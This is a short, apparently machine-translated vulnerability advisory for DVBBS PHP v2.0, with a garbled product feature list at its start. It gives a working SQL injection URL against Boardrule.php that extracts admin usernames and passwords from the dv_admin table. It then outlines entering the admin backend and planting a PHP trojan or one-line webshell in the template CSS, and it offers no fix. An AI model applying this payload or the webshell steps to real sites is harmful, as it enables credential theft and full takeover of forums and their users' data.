Affected Versions:
DVBBS php v2.0 vulnerability description:
PHP2.0 ++ features:
1. resumable database backup to synchronize the backed up data with Forum data;
2. Multiple forms of Url rewrite pseudo-static to improve SEO;
3. multithreading information collection to reduce the complexity of manual operations;
4. Automatic Upgrade adopts the multi-thread breakpoint resume PHP download module;
5. A File Installation forum has been created in the international forum;
6. The innovative and caring new post-and-paste mode is being enabled-making great achievements in dynamic network PHP2.0 ++;
7. give full play to the advantages of PHP and use a large number of mature cache mechanisms
8. excellent background search functions;
9. User Experience
Boardrule. php has the SQL injection vulnerability. <* Reference
Http://p.dvbbs.net/
*>
Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! Boardrule. php? Groupboardid = 1/**/union/**/select/**/concat (0xBAF3CCA8D3C3BBA7C3FBA3BA, username, 0x202020C3DCC2EBA3BA, password) /**/from % 20dv_admin % 20 where % 20id % 20 between % 201% 20and % 204 /**/
Admin/index. php
Go to the background ..
Add the php trojan in the template CSS, or use a single-line Trojan to connect to the webshell. The security suggestions for SEBUG are as follows:
None
Http://p.dvbbs.net/